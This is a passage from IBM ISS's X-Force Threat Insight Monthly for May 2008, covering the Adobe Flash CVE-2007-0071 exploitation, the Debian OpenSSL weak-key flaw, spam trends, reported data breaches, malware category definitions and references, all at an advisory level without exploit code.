On May 27, 2008, reports16 of active exploitation of a “zero-day” vulnerability in
Adobe Flash Player surfaced. Upon investigation, our analysts determined that
the circulating exploits were actually targeting the issue identified by CVE-
2007-0071, discovered by an X-Force team analyst and discussed in the
protection advisory17 released in April of this year. The Adobe Product Security
Incident Response Team also confirmed that the exploit in question is targeting
this previously disclosed patched issue in Adobe Flash Player.
X-Force Threat Insight Monthly
Page 29

Adobe Flash Player does not properly handle a specific tag that can exist in
multimedia files. Improper handling of certain values causes a pointer
calculation to go awry, which allows the attacker to write to any memory
location and execute code. Attackers are injecting malicious code into third-
party sites that redirects users to sites hosting malicious files. These attacks
may also be tied to the SQL injection attacks noted in this report.

The ISS IPS coverage released in November of 2007 blocks the samples that are
currently circulating in the wild. The specific signature that covers this issue is
Multimedia_File_Overflow and is turned on and blocked by default in the Trust
X-Force policy. We also encourage those affected to ensure that the latest Adobe
Flash Player version, 9.0.124.0 or later, is installed.

Debian OpenSSL Debacle

A serious vulnerability affecting Debian’s OpenSSL package was disclosed in
May (CVE-2008-0166). The random number generator in this package is
predictable. Affected keys include SSH keys, OpenVPN keys, DNSSEC keys,
and key material for use in X.509 certificates and session keys used in SSL/TLS
connections. Ubuntu systems also use this OpenSSL package and are therefore
vulnerable to this issue. This issue may impact any of the other distributions or
run-live CDs based on Debian Etch, such as Knoppix and several bootable
business cards.

Within 24 hours of the announcement of the vulnerability, the complete set of

all the possible 1024 bit DSA, 2048 bit RSA, and 4096 bit RSA keys that would
have been generated by this flawed code were posted publicly to a Web site.
Additionally, a Perl script was made publicly available that can be used in
conjunction with these publicly available keys to conduct SSH brute force
attacks. At the time of this writing, our analysts had not observed any brute
force attempts against authentication keys - attempts have all been made
against passwords.

Those running Debian18 or Ubuntu19 systems and using keys for SSH
authentication that were generated between September 2006, and May 13, 2008,
are vulnerable. We strongly urge all those that are affected to upgrade their
OpenSSL package and subsequently regenerate any cryptographic material.
X-Force Threat Insight Monthly
Page 30

30th Anniversary of SPAM

May 2008 marks the 30th Anniversary of the first spam message ever sent. On
an average day, IBM ISS analyzes more than 150,000 unique spam messages.
Spam’s impact is global - reducing productivity within and consuming network
resources of organizations around the world. As with all contemporary cyber
threats, spammers are well organized and are constantly evolving and
improving their techniques while trying to stay one step ahead of both the
victim and the security products deployed to thwart their campaigns.

Spammers will continue to inundate our inboxes with propaganda as long as

there is profit to be made. While many of us may delete, filter or block spam,
there are individuals who purchase the advertised items or fall for an advance
fee fraud or lottery scam, thus creating a motive for the spammer. According to
a 2007 survey conducted by Sophos, 11 percent of the individuals polled had
bought spam-advertised goods.20 If we were to all ignore spam, those seeking
financial gain would have to presumably drop this weapon from their arsenal as
it would no longer be a profitable venture.

The X-Force team believes that most spam e-mail is sent by bot networks.
Botnet operators “rent” their bots out to spammers who then launch massive
e-mail barrages in the shortest possible time to maximize their output while
escaping detection or blocking by antispam technologies and services. Since
bots can be controlled from anywhere, the nationality of the actual attackers
behind a spam e-mail may not be the same as the country from which the spam
originated. Additional spam statistics can be obtained from the IBM Internet
Security Systems X-Force 2007 Trend Statistics (PDF) report.21

The spam industry will remain alive and well as long as there are recipients that
continue to provide spammers with the incentive to keep it going. Users should
be advised to ignore spam and avoid opening unsolicited attachments whether
it is an image, PDF, Microsoft Excel® or other type of file. An organization’s
anti-spam strategy should consist of an effective e-mail filter using
sophisticated techniques to analyze e-mail traffic.
X-Force Threat Insight Monthly
Page 31

Major security breaches

A number of high-profile security breaches are reported every year drawing
attention to the need to protect consumer and employee information from the
risk of exposure to malicious individuals/identity (ID) theft rings. In addition
to the loss or misplacement of information, corporations and individuals are at
risk to exposure via malware, hacking, phishing attacks and various social
engineering tactics. There are also non-cyber related methods such as stealing
mail, “dumpster-diving” (rummaging through trash bins), or obtaining
information from employees or stolen records. Below are some of the major
security breaches that became public in the month of May:

• Bank of New York – An unencrypted backup tape containing sensitive information

of some 4.5 million consumers went missing during transportation to a storage
facility. 22
• Chile Government sites – A hacker broke into various Chilean government sites
and obtained data on 6 million people, which the hacker then posted publicly to the
Internet. 23
• Dave & Buster’s – Attackers compromised the network and remotely installed
packet sniffing software on point-of-sale servers at eleven Dave & Buster’s locations
throughout the U.S. The details of thousands of payment cards were accessed and
fraudulent transactions took place. 24
• Oklahoma State University – A server under the control of OSU Parking and
Transit Services was accessed from another country without authorization. The
database contained sensitive information, including addresses and Social Security
numbers of OSU faculty, staff and students who had purchased a parking permit
between July 2002 and March 2008. 25
• Staten Island University Hospital – Computer equipment was stolen containing
the personal information of about 88,000 patients. 26
• US State Department – As many as 1,000 laptops are unaccounted for, several of
which may belong to the department’s Anti-Terrorism Assistance Program. 27
X-Force Threat Insight Monthly
Page 32

Malcode Corner
As part of the continued effort of the IBM ISS X-Force Virus Prevention System
(VPS) team in the strengthening of IBM ISS antivirus, anti-spyware and anti-
malware protection, the VPS team investigated and added another 12,158 new
samples to the malcode zoo in May, 2008.

The X-Force VPS team’s categorization of malcode is based on the most

dominant features of the threat. The categories are:

• Adware – Designed to deliver advertisements and in most cases, these

advertisements are unwanted.
• Backdoor – Provides functionality for a remote attacker to log on and/or execute
arbitrary commands on the affected system.
• Dialer – Uses modem connections to either dial back to the attacker or causes the
affected system to use primary-rate billing numbers when making connections.
• Downloader – Low-profile malcode that downloads and installs a more
sophisticated or updated malcode agent.
• Miscellaneous – All other malcode not falling into one of the primary categories.
• Password Stealer – Designed primarily to steal login credentials, such as those
used for instant messaging, online games and online applications.
• Rootkit – Usually acts as a component of another malcode and has the
functionality to hide files, registry entries and processes.
• Spy – Designed to monitor the user’s activity, such as logging key strokes and
tracking the user’s online activities. Similar to password stealers, Spy malcodes
may also have the functionality to capture login credentials and other confidential
information sent to online applications.
• Trojan – Usually appears to be a legitimate application before installing itself and
performing its malicious actions on the system. Examples of malicious actions can
include dropping another malcode, lowering the system’s security settings, and
allowing a remote attacker to relay network connections via the affected system in
order to conceal the real origin of the attacker.
• Virus – Propagates by infecting a host file and possibly doing some form of damage
to the host file.
• Worm – Self-propagates via e-mail, network shares, removable drives, file sharing
applications or instant messaging applications.
X-Force Threat Insight Monthly
Page 33

15.7%

17.2% 10.6%

6.7%

6.5%

3.9%
2.5%
34.6% 1.9%
0.4%
0.0%

List of contributors for this paper include:

Michelle Alvarez – Team Leader, IBM MSS Intelligence Center

Michael Warfield – Senior Researcher and Analyst, IBM MSS Intelligence Center
Troy Bollinger – Senior Researcher, IBM MSS Intelligence Center
Luann Johnson – Manager, IBM ISS X-Force Database
IBM ISS X-Force Virus Prevention System (VPS) team
X-Force Threat Insight Monthly
Page 34

References

An Illustrated Guide to SSH Agent Forwarding

http://www.unixwiz.net/techtips/ssh-agent-forwarding.html

Secure Linux/UNIX access with PuTTY and OpenSSH

http://www.unixwiz.net/techtips/putty-openssh.html

Using public keys for SSH authentication

http://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter8.html

OpenSSH key management, Part 1 Understanding RSA/DSA authentication

http://www.ibm.com/developerworks/library/l-keyc.html

OpenSSH key management, Part 2 Introducing ssh-agent and keychain

http://www.ibm.com/developerworks/library/l-keyc2/

OpenSSH key management, Part 3 Agent forwarding and keychain improvements

http://www.ibm.com/developerworks/linux/library/l-keyc3/

SQL Injection
1
SQL Injection
http://en.wikipedia.org/wiki/SQL_injection

2
Mass Attack JavaScript injection - UN and UK Government websites compromise
http://securitylabs.websense.com/content/Alerts/3070.aspx

3
United Nations, I Hate to Say I Told You So
http://hackademix.net/2008/04/23/united-nations-i-hate-to-say-i-told-
you-so/

4
A protection alert provided by IBM ISS: Automated SQL Injection Attacks
http://iss.net/threats/293.html

5
A protection advisory provided by IBM ISS: Adobe Flash Player Invalid
Pointer Vulnerability
http://iss.net/threats/289.html
X-Force Threat Insight Monthly
Page 35

6
The 10.000 web sites infection mystery solved
http://isc.sans.org/diary.html?storyid= 4294

7
Danmec/Asprox SQL Injection Attack Tool Analysis
http://www.secureworks.com/research/threats/danmecasprox

8
Gold farming
http://en.wikipedia.org/wiki/Gold_farming

9
Urgent: Deciphering binary code executed against the database
http://www.developersdex.com/sql/message.asp?p=2290&r= 6279713

10
What tuning options should I consider before enabling blocking for
SQL_Injection?
http://iss.custhelp.com/cgi-bin/iss.cfg/php/enduser/std_adp.php?p_
faqid= 4748

Prolific and impacting issues of May 2008

11
UPDATE: MSRC Blog: Microsoft Security Advisory (950627)
http://blogs.technet.com/msrc/archive/2008/03/24/update-msrc-blog-
microsoft-security-advisory-950627.aspx

12
A protection alert provided by IBM ISS: Microsoft Jet Database Engine
(msjet40.dll) Remote Code Execution
http://iss.net/threats/292.html

13
Microsoft Security Bulletin MS08-028: Vulnerability in Microsoft Jet
Database Engine Could Allow Remote Code Execution (950749)
http://www.microsoft.com/technet/security/bulletin/ms08-028.mspx

14
CVE-2007-6026
http://cve.mitre.org/cgi-bin/cvename.cgi?name= CVE-2007-6026

15
A protection alert provided by IBM ISS: Automated SQL Injection Attacks
http://iss.net/threats/293.html
X-Force Threat Insight Monthly
Page 36

16
Adobe Flash zero-day exploit in the wild
http://blogs.zdnet.com/security/?p=1189

A protection advisory provided by IBM ISS: Adobe Flash Player Invalid

17

Pointer Vulnerability
http://iss.net/threats/289.html

18
Debian Security Advisory DSA-1571-1 : openssl – predictable random
number generator
http://www.debian.org/security/2008/dsa-1571

19
Ubuntu Security Notice USN-612-2: openssh vulnerability
http://www.ubuntu.com/usn/usn-612-2

20
11% of people admit to having bought goods sold via spam
http://www.sophos.com/pressoffice/news/articles/2007/12/spam-buyers.html

21
IBM Internet Security Systems X-Force 2007 Trend Statistics (PDF) report.
http://www.iss.net/documents/literature/x-force_2007_trend_statistics_
report.pdf

22
Data breach at New York bank possibly affecting hundreds of thousands of
CT consumers
http://www.stamfordplus.com/stm/information/nws1/publish/News_1/
Data_breach_at_New_York_bank_possibly_affecting_hundreds_of_
thousands_of_CT_consumers2408.shtml

23
Hacker splashes data from six million Chileans on Internet: report
http://afp.google.com/article/
ALeqM5gBr0NRGekgAS90YwVpnBHHCxeLZw

24
Restaurant chain hacked by packet sniffer
http://www.techworld.com/security/news/index.cfm?newsid=101479

25
OSU Parking Services and Transit Incident
http://idalert.okstate.edu/incident_00003.html
X-Force Threat Insight Monthly
Page 37

26
Staten Island University Hospital Patients Personal Records Stolen In
December
http://cyberinsecure.com/staten-island-university-hospital-patients-
personal-records-stolen-in-december/

27
US State Department loses a lot of laptops
http://www.securecomputing.net.au/news/75415,us-state-department-
loses-a-lot-of-laptops.aspx

*Information in this document concerning non-IBM products was obtained

from the suppliers of these products, published announcement material or
other publicly available sources. Questions on the capabilities of non-IBM
products should be addressed to the suppliers of those products.

All performance data contained in this publication was obtained in the specific
operating environment and under the conditions described above and is
presented as an illustration. Performance obtained in other operating
environments may vary and customers should conduct their own testing.
© Copyright IBM Corporation 2008.

IBM Global Services

Route 100
Somers, NY 10589
U.S.A.

Produced in the United States of America.

06-08

All Rights Reserved.

IBM and the IBM logo are trademarks or registered

trademarks of International Business Machines
Corporation in the United States, other countries, or
both. ADDME, Ahead of the threat, BlackICE, Internet
Scanner, Proventia, RealSecure, SecurePartner,
SecurityFusion, SiteProtector, System Scanner, Virtual
Patch, X-Force and X-Press Update are trademarks or
registered trademarks of Internet Security Systems, Inc.
in the United States, other countries, or both. Internet
Security Systems, Inc. is a wholly-owned subsidiary of
International Business Machines Corporation.

Microsoft, Windows, Excel and SQL Server are

trademarks or registered trademarks of the Microsoft
Corporation in the United States, other countries, or both.

UNIX is a registered trademark of The Open Group in

the United States and other countries.

Linux is a registered trademark of Linus Torvalds in the

U.S. and other countries.

Google is a trademark of Google, Inc. in the U.S. and

other countries.

World of Warcraft is a trademark of Blizzard

Entertainment in the U.S. and/or other countries.

RealPlayer is a trademark or registered trademark of

RealNetworks, Inc.

Other company, product and service names may be

trademarks or service marks of others.

References in this publication to IBM products or

services do not imply that IBM intends to make them
available in all countries in which IBM operates.

U.S. Patent No. 7,093,239